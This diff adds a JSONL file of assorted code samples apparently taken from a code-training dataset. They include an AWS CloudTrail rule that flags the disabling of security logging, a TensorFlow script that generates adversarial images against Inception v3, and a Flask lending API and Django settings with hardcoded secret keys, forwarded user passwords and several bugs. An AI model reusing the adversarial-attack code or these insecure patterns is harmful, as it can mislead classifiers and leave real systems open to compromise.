diff --git "a/4130.jsonl" "b/4130.jsonl" new file mode 100644--- /dev/null +++ "b/4130.jsonl" @@ -0,0 +1,770 @@ +{"seq_id":"456189523","text":"import random\n\ndef e(num):\n\n sum = 0\n for x in range(0, num):\n current = 0.0\n while current < 1:\n current += random.random()\n sum += 1\n\n return sum / num\n\nprint(e(1000000)) #as num increases, answer gets closer to e\n","sub_path":"python/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"437264687","text":"SECURITY_CONFIG_ACTIONS = {\n 'DeleteAccountPublicAccessBlock',\n 'DeleteDeliveryChannel',\n 'DeleteDetector',\n 'DeleteFlowLogs',\n 'DeleteRule',\n 'DeleteTrail',\n 'DisableEbsEncryptionByDefault',\n 'DisableRule',\n 'StopConfigurationRecorder',\n 'StopLogging',\n}\n\n\ndef rule(event):\n if event['eventName'] == 'UpdateDetector':\n return not event['requestParameters'].get('enable', True)\n\n return event['eventName'] in SECURITY_CONFIG_ACTIONS\n\n\ndef title(event):\n user = event['userIdentity'].get('userName') or event['userIdentity'].get(\n 'sessionContext').get('sessionIssuer').get('userName')\n\n return f\"Sensitive AWS API call {event['eventName']} made by {user}\"\n","sub_path":"aws_cloudtrail_rules/aws_security_configuration_change.py","file_name":"aws_security_configuration_change.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"645219315","text":"class Solution:\n def isValidSudoku(self, board) -> bool:\n if self.column_has_repeat(board):\n return False\n if self.row_has_repeat(board):\n return False\n if self.sudoku9_has_repeat(board):\n return False\n return True\n\n @staticmethod\n def has_repeat_number(array: list):\n newList = list(filter(lambda item: item != '.', array))\n return len(set(newList)) != len(newList)\n\n def row_has_repeat(self, board):\n # 遍历行\n for item in board:\n if self.has_repeat_number(item):\n return True\n return False\n\n def column_has_repeat(self, board):\n # 遍历列\n x = 0\n while x < 9:\n temp = []\n y = 0\n while y < 9:\n temp.append(board[y][x])\n y += 1\n if self.has_repeat_number(temp):\n return True\n x += 1\n temp.clear()\n return False\n\n def sudoku9_has_repeat(self, board):\n # 遍历3x3格\n x = 0\n y = 0\n startY = y\n temp = []\n while y < 9:\n temp.extend(board[y][x:x + 3])\n temp.extend(board[y + 1][x:x + 3])\n temp.extend(board[y + 2][x:x + 3])\n x += 3\n\n if self.has_repeat_number(temp):\n return True\n temp.clear()\n if x == 9:\n x = 0\n startY += 3\n\n y = startY\n return False\n\n\ns = Solution()\nres = s.isValidSudoku([[\"5\", \"3\", \".\", \".\", \"7\", \".\", \".\", \".\", \".\"],\n [\"6\", \".\", \".\", \"1\", \"9\", \"5\", \".\", \".\", \".\"],\n [\".\", \"9\", \"8\", \".\", \".\", \".\", \".\", \"6\", \".\"],\n [\"8\", \".\", \".\", \".\", \"6\", \".\", \".\", \".\", \"3\"],\n [\"4\", \".\", \".\", \"8\", \".\", \"3\", \".\", \".\", \"1\"],\n [\"7\", \".\", \".\", \".\", \"2\", \".\", \".\", \".\", \"6\"],\n [\".\", \"6\", \".\", \".\", \".\", \".\", \"2\", \"8\", \".\"],\n [\".\", \".\", \".\", \"4\", \"1\", \"9\", \".\", \".\", \"5\"],\n [\".\", \".\", \".\", \".\", \"8\", \".\", \".\", \"7\", \"9\"]]\n )\nprint(res)\n","sub_path":"leetcode/array/30.py","file_name":"30.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
+{"seq_id":"114599099","text":"###################################################\n# Author: Liu Aishan #\n# Date: 2018.3.26 #\n# Create adversarial examples under #\n# different image transformation distributions #\n###################################################\n\n\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\nimport tensorflow.contrib.slim.nets as nets\nimport PIL\nimport numpy as np\nimport os\nimport tarfile\nimport matplotlib.pyplot as plt\nimport json\n\n\nsess = tf.InteractiveSession()\n\nimage = tf.Variable(tf.zeros((299, 299, 3)))\n\nlog_dir = 'inception_v3_log'\nif not os.path.exists(log_dir):\n\tos.makedirs(log_dir)\n\n# inception_v3 model\ndef inception(image, reuse=False):\n\tpreprocessed = tf.multiply(tf.subtract(tf.expand_dims(image, 0), 0.5), 2.0)\n\targ_scope = nets.inception.inception_v3_arg_scope(weight_decay=0.0)\n\twith slim.arg_scope(arg_scope):\n\t\tlogits,_ = \tnets.inception.inception_v3(preprocessed, 1001, is_training=False, reuse=reuse)\n\t\tlogits = logits[:, 1:]\n\t\tprobs = tf.nn.softmax(logits)\n\treturn logits, probs\n\nlogits, probs = inception(image)\n\ndata_dir = '../data'\nimg_path = os.path.join(data_dir, 'girl.jpeg')\n\nrestore_vars =[ var for var in tf.global_variables() if var.name.startswith('InceptionV3/')]\nsaver = tf.train.Saver(restore_vars)\nsaver.restore(sess, os.path.join(data_dir,'inception_v3.ckpt'))\n\nimagenet_json = os.path.join(data_dir,\"imagenet.json\")\nwith open(imagenet_json) as f:\n\timagenet_labels = json.load(f)\n\n# classify a image into its class and show result\ndef classify(img, correct_class=None, target_class=None):\n\tfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(10, 8))\n\tfig.sca(ax1)\n\tp = sess.run(probs, feed_dict={image: img})[0]\n\tax1.imshow(img)\n\tfig.sca(ax1)\n\n\ttopk = list(p.argsort())[-10:][::-1]\n\ttopprobs = p[topk]\n\tbarlist = ax2.bar(range(10), topprobs)\n\tif target_class in topk:\n\t\tbarlist[topk.index(target_class)].set_color('r')\n\tif correct_class in topk:\n\t\tbarlist[topk.index(correct_class)].set_color('g')\n\tplt.sca(ax2)\n\tplt.ylim([0, 1.1])\n\tplt.xticks(range(10), [imagenet_labels[i][:15] for i in topk],\n\t\t\t\trotation='vertical')\n\tfig.subplots_adjust(bottom=0.2)\n\tplt.show()\n\ndata_dir = '../data'\nimg_path = os.path.join(data_dir, 'girl.jpeg')\n# image preprocessing\n# PIL seems have sth wrong with TF when add tf.image.adjust_brightness()\nimg_class = 281\nimg = PIL.Image.open(img_path)\n#img.width = img.size[0]\n#img.height = img.size[1]\nbig_dim = max(img.width, img.height)\nwide = img.width > img.height\nnew_w = 299 if not wide else int(img.width * 299 / img.height)\nnew_h = 299 if wide else int(img.height * 299 / img.width)\nimg = img.resize((new_w, new_h)).crop((0, 0, 299, 299))\nimg = (np.asarray(img) / 255.0).astype(np.float32)\n\n#classify(img, correct_class=img_class)\n\n\nx = tf.placeholder(tf.float32, (299, 299, 3))\n\n# trainable image to get adversarial example\nx_hat = image\nassign_op = tf.assign(x_hat, x)\n\nlearning_rate = tf.placeholder(tf.float32, ())\ny_hat = tf.placeholder(tf.int32, ())\n\nlabels = tf.one_hot(y_hat, 1000)\n\n# get a adversarial example under different image transformation distributions\n\nnum_samples = 4 # samples number needed to be increased when GPU is available\naverage_loss = 0\n\n\nfor i in range(num_samples):\n\tnoise_img = tf.add(image, tf.clip_by_value(tf.random_normal(shape=image.get_shape(), mean=0, stddev=1), 0, 0.25))\n\tnoise_img = tf.clip_by_value(noise_img, 0, 1)\n\tnoise_logits, _ = 
inception(noise_img, reuse = True)\n\taverage_loss += tf.nn.softmax_cross_entropy_with_logits(logits=noise_logits, labels = labels) / num_samples\n\n# optimizer\noptim_step = tf.train.GradientDescentOptimizer(learning_rate).minimize(average_loss, var_list=[x_hat])\n\nepsilon = tf.placeholder(tf.float32, ())\n\n# clip need to be done to make sure noise 'imperceptible' to human eyes\nbelow = x - epsilon\nabove = x + epsilon\nprojected = tf.clip_by_value(tf.clip_by_value(x_hat, below, above), 0, 1)\nwith tf.control_dependencies([projected]):\n project_step = tf.assign(x_hat, projected)\n\n# training process\ndemo_epsilon2 = 8.0/255.0\ndemo_lr2 = 2e-1\ndemo_steps2 = 100 # need more than 100 steps\ndemo_target2 = 924\n\nsess.run(assign_op, feed_dict={x:img})\n\nfor i in range(demo_steps2):\n\t_, loss_value = sess.run([optim_step, average_loss], feed_dict={learning_rate: demo_lr2, y_hat: demo_target2})\n\n\tsess.run(project_step, feed_dict={x: img, epsilon: demo_epsilon2})\n\tif (i+1) % 10 == 0 :\n\t\tprint(\" step %d, loss %g\" %(i+1, loss_value))\n\nadv_robust = x_hat.eval()\n\nfor i in range(0, 10):\n\tnoise_image = tf.add(image, tf.clip_by_value(tf.random_normal(shape=image.get_shape(), mean=0, stddev=1), 0, 0.25))\n\tnoise_image = tf.clip_by_value(noise_image, 0, 1)\n\tnoise_ex = noise_image.eval(feed_dict={image: adv_robust})\n\tclassify(noise_ex, correct_class=img_class, target_class=924)\n","sub_path":"src/testNoise.py","file_name":"testNoise.py","file_ext":"py","file_size_in_byte":4804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"569801846","text":"# -*- coding: utf-8 -*-\n\nSOCKET_URL = (\n (0, '富豪服务器'),\n (1, '三消服务器'),\n (9999, '其他服务器'),\n)\n\nSANXIAO_SOCKET_URL_TEST = 'http://192.168.20.140:8000/'\nSANXIAO_SOCKET_URL_FZ = 'https://xyxsxfz.nalrer.cn/'\nSANXIAO_SOCKET_URL_ONLINE = 'https://xyxsx.nalrer.cn/'\n\nFUHAO_SOCKET_URL_TEST = 'http://192.168.20.108:8000/'\nFUHAO_SOCKET_URL_FZ = 'https://fz.nalrer.cn/'\nFUHAO_SOCKET_URL_ONLINE = 'https://openrich.nalrer.cn/'\n\n\ndef getSocketUrl(id):\n if id == 0:\n return FUHAO_SOCKET_URL_ONLINE\n elif id == 1:\n return SANXIAO_SOCKET_URL_ONLINE\n else:\n return ''\n\n\ndef gain_SetSocketApi(id):\n if id == 0:\n return 'v3/game/zmgm/set'\n elif id == 1:\n return 'api/wx/zmgm/set'\n else:\n return ''\n\ndef gain_GetSocketApi(id):\n if id == 0:\n return 'v3/game/zmgm/get'\n elif id == 1:\n return 'api/wx/zmgm/get'\n else:\n return ''\n\n\nfrom django.contrib import messages\n\n\ndef flash(request, title, text, level='info'):\n \"\"\"\n 利用django的message系统发送一个信息。\n \"\"\"\n level_map = {\n 'info': messages.INFO,\n 'debug': messages.DEBUG,\n 'success': messages.SUCCESS,\n 'warning': messages.WARNING,\n 'error': messages.ERROR\n }\n\n level = level_map[level]\n\n messages.add_message(request, level, text, extra_tags=title)\n return 'ok'\n\nimport time\n\ndef timeStampToStr(ts, formatTime = \"%Y-%m-%d %H:%M:%S\"):\n t = time.localtime(ts)\n return time.strftime(formatTime, t)","sub_path":"common/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"287006192","text":"cards = input().split()\nn_shuffles = int(input())\n\ntop_card = cards[0]\nbottom_card = cards[-1]\n\nhalf = len(cards) // 2\n\nleft_cards = []\nright_cards = []\n\nshuffle_cards = []\n\nfor n_shuffles in range(n_shuffles):\n for index in range(1, half):\n left_cards.append(cards[index])\n\n for index in 
range(half, len(cards) - 1):\n right_cards.append(cards[index])\n\n for index in range(len(left_cards)):\n shuffle_cards.append(right_cards[index])\n shuffle_cards.append(left_cards[index])\n\n cards = shuffle_cards.copy()\n cards.append(bottom_card)\n cards.insert(0, top_card)\n shuffle_cards = []\n left_cards = []\n right_cards = []\n\nprint(cards)","sub_path":"3_lists_basics/5_faro_.shuffle.py","file_name":"5_faro_.shuffle.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"69202831","text":"from django.core.context_processors import csrf\nfrom django.shortcuts import redirect, render_to_response\nfrom page.forms import PagedownModelForm\nfrom site_list.models import MarkdownSite\nfrom page.models import MarkdownPage\nfrom django.http.response import Http404\nfrom django.contrib import auth\nfrom django.utils.timezone import now\n\ndef editPage(request, site_url, page_url):\n args = {}\n args.update(csrf(request))\n args.update({'request':request, 'username': auth.get_user(request).username,\n 'form': PagedownModelForm,'site': MarkdownSite.objects.get(url = site_url),\n 'page': MarkdownPage.objects.get(url = page_url)})\n check_for_http404(request, site_url)\n if request.POST:\n execute_editing(request, page_url)\n return redirect('/sites/'+site_url+'/'+page_url)\n else:\n return render_to_response('page_editor.html', args)\n\ndef execute_editing(request, page_url):\n page_content = request.POST.get('markdown_edit_field', '')\n if page_content==\"\": page_content = \" \"\n page = MarkdownPage.objects.get(url = page_url)\n edit_page(page, page_content)\n\ndef check_for_http404(request, site_url):\n if auth.get_user(request) != MarkdownSite.objects.get(url = site_url).user:\n raise Http404\n\ndef edit_page(page, page_content):\n page.content = page_content\n page.last_edit_time = now()\n page.save()","sub_path":"page_editor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"116582344","text":"LOGTAIL_FILES = {\n 'noexist': '/foo/bar',\n 'test': 'test.log',\n}\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': 'example.db',\n }\n}\nSITE_ID = 1\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\nSTATIC_ROOT = ''\nSTATIC_URL = '/static/'\n\nSECRET_KEY = ')@g^2o!ojviexmcsbr%pfctj!2fx-v7=c*rn$7(*k%y8u!!)o0'\nROOT_URLCONF = 'example.urls'\nWSGI_APPLICATION = 'example.wsgi.application'\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.admin',\n 'django_logtail',\n)\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n","sub_path":"example/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"630818098","text":"import os\nimport sys\nimport 
pygame\n\npygame.init()\nsize = width, height = 500, 500\nscreen = pygame.display.set_mode(size)\nall_sprites = pygame.sprite.Group()\nsprite = pygame.sprite.Sprite()\npygame.mouse.set_visible(False)\n\n\ndef load_image(name, colorkey=None):\n fullname = os.path.join('data', name)\n if not os.path.isfile(fullname):\n print(f\"Файл с изображением '{fullname}' не найден\")\n sys.exit()\n image = pygame.image.load(fullname)\n if colorkey is not None:\n image = image.convert()\n if colorkey == -1:\n colorkey = image.get_at((0, 0))\n image.set_colorkey(colorkey)\n else:\n image = image.convert_alpha()\n return image\n\nsprite.image = load_image(\"arrow.png\")\nsprite.rect = sprite.image.get_rect()\nall_sprites.add(sprite)\nclock = pygame.time.Clock()\ntickrate = 60\nrunning = True\nwhile running:\n for e in pygame.event.get():\n if e.type == pygame.QUIT:\n running = False\n if pygame.mouse.get_focused():\n pos = pygame.mouse.get_pos()\n sprite.rect.x, sprite.rect.y = pos[0], pos[1]\n screen.fill(\"black\")\n all_sprites.draw(screen)\n pygame.display.flip()\n clock.tick(tickrate)","sub_path":"te.py","file_name":"te.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"137254236","text":"# coding=utf-8\nfrom flask import Flask, render_template, url_for, request, redirect, g, session, make_response, jsonify\nfrom model import User, Book, Identifier, NcuOS\nimport sqlite3, requests, json\nfrom functools import wraps\nfrom flask_cors import CORS\nfrom werkzeug.security import generate_password_hash\n\napp = Flask(__name__)\napp.config[\"DATABASE\"] = 'database.db'\napp.config[\"SECRET_KEY\"] = 'I am NCU homer.'\napp.config['JSON_AS_ASCII'] = False\n\n# CORS(app, support_credentials=True)\n\n\ndef connect_db():\n db = sqlite3.connect(app.config[\"DATABASE\"])\n return db\n\ndef init_db():\n with app.app_context():\n db = connect_db()\n with app.open_resource('schema.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\ndef insert_user_to_db(user):\n sql_insert = 'INSERT INTO users (username, student_id, password, status) values (?, ?, ?, ?)'\n args = [user.username, user.student_id, user.password, user.status]\n g.db.execute(sql_insert, args)\n g.db.commit()\n\ndef insert_student_id_to_db(student_id):\n sql_insert = 'INSERT INTO identifiers (student_id) values (?)'\n args = [student_id]\n g.db.execute(sql_insert, args)\n g.db.commit()\n\ndef insert_book_to_db(book):\n sql_insert = 'INSERT INTO books (book_name, author, owner, status, price, lend_time, period, image) values (?, ?, ?, ?, ?, ?, ?)'\n args = [book.book_name, book.author, book.owner, book.status, book.price, book.lend_time, book.period, book.image]\n g.db.execute(sql_insert, args)\n g.db.commit()\n\ndef update_user_status(user):\n sql_update = \"UPDATE users SET status = '1' WHERE student_id=?\"\n args = [user.student_id]\n g.db.execute(sql_update, args)\n g.db.commit()\n\ndef query_users_by_username(username):\n sql_select = 'SELECT * FROM users WHERE username=?'\n args = [username]\n cur = g.db.execute(sql_select, args)\n items = cur.fetchall()\n if len(items) < 1:\n return None\n first_item = items[0]\n query_username = User()\n query_username.username = first_item[1]\n return query_username\n\ndef query_users_by_student_id(student_id):\n sql_select = 'SELECT * FROM users WHERE student_id=?'\n args = [student_id]\n cur = g.db.execute(sql_select, args)\n items = cur.fetchall()\n if len(items) < 1:\n return None\n 
first_item = items[0]\n    query_student_id = User()\n    query_student_id.username = first_item[1]\n    query_student_id.student_id = first_item[2]\n    query_student_id.password = first_item[3]\n    query_student_id.status = first_item[4]\n    query_student_id.address = first_item[6]\n    return query_student_id\n\ndef query_books(data):\n    if data == '':\n        sql_select = 'SELECT * FROM books'\n        cur = g.db.execute(sql_select)\n        items = cur.fetchall()\n        if len(items) < 1:\n            return None\n        return items\n    else:\n        sql_select = 'SELECT * FROM books WHERE book_name LIKE ?'\n        args = ['%' + data + '%']\n        cur = g.db.execute(sql_select, args)\n        items = cur.fetchall()\n        if len(items) < 1:\n            return None\n        return items\n\ndef query_identify(student_id):\n    sql_select = 'SELECT * FROM identifiers WHERE student_id=?'\n    args = [student_id]\n    cur = g.db.execute(sql_select, args)\n    items = cur.fetchall()\n    if len(items) < 1:\n        return None\n    first_item = items[0]\n    query_student_id = Identifier()\n    query_student_id.student_id = first_item[1]\n    return query_student_id\n\ndef check_password(self, password):\n    from werkzeug.security import check_password_hash\n    return check_password_hash(self.password, password)\n\ndef identify_by_ncu_os(ncu_os):\n    url_token = 'https://os.ncuos.com/api/user/token'\n    headers_token = {\n        \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36\",\n        \"content-type\": \"application/json\"\n    }\n    payload = {\n        \"username\": ncu_os.username,\n        \"password\": ncu_os.password\n    }\n    try:\n        res_token = requests.post(url_token, headers=headers_token, data=json.dumps(payload))\n        token = 'passport ' + json.loads(res_token.text)['token']\n        url_profile = 'https://os.ncuos.com/api/user/profile/basic'\n        headers_profile = {\n            \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36\",\n            \"content-type\": \"application/json\",\n            \"authorization\": token\n        }\n        res_profile = requests.get(url_profile, headers=headers_profile)\n        profile = json.loads(res_profile.text)['base_info']['xh']\n        return profile\n    except:\n        profile = '0'\n        return profile\n\ndef sign_in_check(f):\n    @wraps(f)\n    def decorated_function(*args, **kwargs):\n        if \"student_id\" not in session:\n            data = {\n                'status': '0',\n                'message': '未登录'\n            }\n            res = make_response(jsonify(data))\n            res.headers['Access-Control-Allow-Credentials'] = 'true'\n            res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n            return res\n        return f(*args, **kwargs)\n    return decorated_function\n\n@app.before_request\ndef before_request():\n    g.db = connect_db()\n\n@app.teardown_request\ndef teardown_request(self):\n    if hasattr(g, 'db'):\n        g.db.close()\n\n#@app.after_request\n#def after_request(response):\n    # ip = request.remote_addr\n    # response.headers.add('Access-Control-Allow-Origin', 'http://' + ip)\n    # response.headers.add('Access-Control-Allow-Headers', 'Content-Type,Authorization')\n    #response.headers.add('Access-Control-Allow-Methods', 'GET,PUT,POST,DELETE,OPTIONS')\n    # response.headers.add('Access-Control-Allow-Credentials', 'true')\n    # return response\n\n@app.route('/')\ndef index():\n    return '
Hello BF
'\n\n@app.route('/sign_up/', methods=['GET', 'POST', 'OPTIONS'])\ndef sign_up():\n if request.method == \"OPTIONS\":\n return 200\n if request.method == \"POST\":\n print(request.get_json())\n query_username = query_users_by_username(request.get_json()['username'])\n if query_username:\n data = {\n 'status': '0',\n 'message': '用户名已存在'\n }\n res = make_response(jsonify(data))\n # res.headers['Access-Control-Allow-Credentials'] = 'true'\n # res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res, 200\n query_student_id = query_users_by_student_id(request.get_json()['student_id'])\n if query_student_id:\n data = {\n 'status': '0',\n 'message': '学号已被注册'\n }\n res = make_response(jsonify(data))\n # res.headers['Access-Control-Allow-Credentials'] = 'true'\n # res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res, 200\n user = User()\n user.username = request.get_json()['username']\n user.student_id = request.get_json()['student_id']\n user.password = generate_password_hash(request.get_json()['password'])\n user.status = '0'\n insert_user_to_db(user)\n data = {\n 'status': '1',\n 'message': '注册成功'\n }\n res = make_response(jsonify(data))\n # res.headers['Access-Control-Allow-Credentials'] = 'true'\n # res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res, 200\n data = {\n 'status': '0',\n 'message': '未注册'\n }\n res = make_response(jsonify(data))\n # res.headers['Access-Control-Allow-Credentials'] = 'true'\n # res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res, 200\n\n@app.route('/identify/', methods=['GET', 'POST','OPTIONS'])\ndef identify():\n if request.method == \"OPTIONS\":\n return 200\n if request.method == \"POST\":\n query_student_id = query_identify(request.get_json()['student_id'])\n if query_student_id:\n data = {\n 'status': '0',\n 'message': '学号已被认证'\n }\n res = make_response(jsonify(data))\n # res.headers['Access-Control-Allow-Credentials'] = 'true'\n # res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n ncu_os = NcuOS()\n ncu_os.username = request.get_json()['student_id']\n ncu_os.password = request.get_json()['password']\n profile = identify_by_ncu_os(ncu_os)\n if str(request.get_json['student_id']) == profile:\n user = User()\n user.student_id = request.get_json()['student_id']\n update_user_status(user)\n insert_student_id_to_db(request.get_json()['student_id'])\n data = {\n 'status': '1',\n 'message': '认证成功'\n }\n res = make_response(jsonify(data))\n # res.headers['Access-Control-Allow-Credentials'] = 'true'\n # res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n else:\n data = {\n 'status': '0',\n 'message': '认证失败'\n }\n res = make_response(jsonify(data))\n # res.headers['Access-Control-Allow-Credentials'] = 'true'\n # res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n data = {\n 'status': '0',\n 'message': '未认证'\n }\n res = make_response(jsonify(data))\n # res.headers['Access-Control-Allow-Credentials'] = 'true'\n # res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n\n@app.route('/sign_in/', methods=['GET', 'POST', 'OPTIONS'])\ndef sign_in():\n if request.method == \"OPTIONS\":\n return 200\n if request.method == \"POST\":\n query_student_id = query_users_by_student_id(request.get_json()['student_id'])\n if not query_student_id:\n data = {\n 'status': '0',\n 'message': '用户不存在'\n }\n res = make_response(jsonify(data))\n res.headers['Access-Control-Allow-Credentials'] = 'true'\n 
#res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n else:\n if not query_student_id.check_password(request.get_json()['password']):\n data = {\n 'status': '0',\n 'message': '密码错误'\n }\n res = make_response(jsonify(data))\n #res.headers['Access-Control-Allow-Credentials'] = 'true'\n #res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n elif query_student_id.status == 0:\n data = {\n 'status': '2',\n 'message': '未认证'\n }\n res = make_response(jsonify(data))\n #res.headers['Access-Control-Allow-Credentials'] = 'true'\n #res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n else:\n session['student_id'] = request.get_json()['student_id']\n data = {\n 'status': '1',\n 'message': '密码正确',\n 'session': session[\"student_id\"]\n }\n res = make_response(jsonify(data))\n #res.headers['Access-Control-Allow-Credentials'] = 'true'\n #res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n data = {\n 'status': '0',\n 'message': '未登录'\n }\n res = make_response(jsonify(data))\n #res.headers['Access-Control-Allow-Credentials'] = 'true'\n #res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n\n@app.route('/logout/')\ndef logout():\n session.pop('student_id', None)\n data = {\n 'status': '1',\n 'message': '已退出登录'\n }\n res = make_response(jsonify(data))\n #res.headers['Access-Control-Allow-Credentials'] = 'true'\n #res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n\n@app.route('/user_zone/', methods=['GET', 'POST', 'OPTIONS'])\n@sign_in_check\ndef user_zone():\n if request.method == \"OPTIONS\":\n return 200\n query_student_id = query_users_by_student_id(session['student_id'])\n data = {\n 'username': query_student_id.username,\n 'student_id': query_student_id.student_id,\n 'address': query_student_id.address,\n 'status': '1',\n 'message': '获取个人资料成功'\n }\n res = make_response(jsonify(data))\n #res.headers['Access-Control-Allow-Credentials'] = 'true'\n #res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n\n@app.route('/glance_book/', methods=['GET', 'POST', 'OPTIONS']) \n@sign_in_check\ndef glance_book():\n if request.method == 'POST':\n return 200\n if request.method == 'GET':\n data = ''\n if request.method == 'POST':\n data = request.get_json()['key']\n books = query_books(data)\n if not books:\n data = {\n 'status': '0',\n 'message': '无'\n }\n res = make_response(jsonify(data))\n #res.headers['Access-Control-Allow-Credentials'] = 'true'\n #res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n data = {\n 'books': books, # book_list\n 'status': '1',\n 'message': '查询成功'\n }\n res = make_response(jsonify(data))\n #res.headers['Access-Control-Allow-Credentials'] = 'true'\n #res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n\n@app.route('/add_book/', methods=['GET', 'POST', 'OPTIONS'])\n@sign_in_check\ndef add_book():\n if request.method == 'OPTIONS':\n return 200\n if request.method == 'POST':\n data = request.get_json()\n book = Book()\n book.book_name = data['book_name']\n book.author = data['author']\n book.owner = session['student_id']\n book.status = '0'\n book.price = data['price']\n book.lend_time = data['lend_time']\n book.period = data['period']\n book.describe = data['describe']\n book.image = 'none'\n try:\n insert_book_to_db(book)\n data = {\n 'book_name': book.book_name,\n 'author': book.author,\n 'status': '1',\n 'message': '上架图书成功'\n }\n res = make_response(jsonify(data))\n 
#res.headers['Access-Control-Allow-Credentials'] = 'true'\n #res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n except:\n data = {\n 'status': '0',\n 'message': '上架图书失败'\n }\n res = make_response(jsonify(data))\n # res.headers['Access-Control-Allow-Credentials'] = 'true'\n # res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=9000)\n","sub_path":"venv/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":15319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"487530837","text":"import unicodedata\nimport unidecode\nimport string\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef Read_Data(filename):\n\tIN=open(filename,\"r\")\n\tIN.readline()\n\tData_Set=[]\n\twhile True:\n\t\tline=IN.readline()\n\t\tif(not line):\n\t\t\tbreak\n\t\tline_list=list(line)\n\t\tFlag=int(line_list[0])\n\t\tfor i in xrange(2,len(line_list)):\n\t\t\tif(line_list[i]==\",\"):\n\t\t\t\tif(i==2):\n\t\t\t\t\ttimestamp=None\n\t\t\t\telse:\n\t\t\t\t\ttimestamp=line_list[2:(i-1)]\n\t\t\t\tComment=\"\".join(line_list[(i+1):len(line_list)])\n\t\t\t\tbreak\n\t\tif(timestamp):\n\t\t\tYear=\"\".join(timestamp[0:4])\n\t\t\tMonth=\"\".join(timestamp[4:6])\n\t\t\tDay=\"\".join(timestamp[6:8])\n\t\t\tHour=\"\".join(timestamp[8:10])\n\t\t\tMinute=\"\".join(timestamp[10:12])\n\t\t\tSecond=\"\".join(timestamp[12:14])\n\t\telse:\n\t\t\tYear=\"N/A\"\n\t\t\n\t\tData_Row=[Flag,Year,Month,Day,Hour,Minute,Second,Comment]\n\t\tData_Set.append(Data_Row)\n\treturn Data_Set\n\n#Not currently used -- not working.\ndef Unicode_to_ASCII(in_string):\n\t#table = {\n\t#\t' ' : '\\\\xa',\n\t#\t'\\n' : None\n\t#\t}\n\tin_string=unicode(in_string)\n\tout_string=in_string.encode(\"utf-8\")\n\tout_string=in_string.encode('ascii',errors='backslashreplace')\n\t#tbl = string.maketrans('\\\\xa',' ')\n\t#out_string=string.translate(tbl)\n\treturn out_string\n\ndef 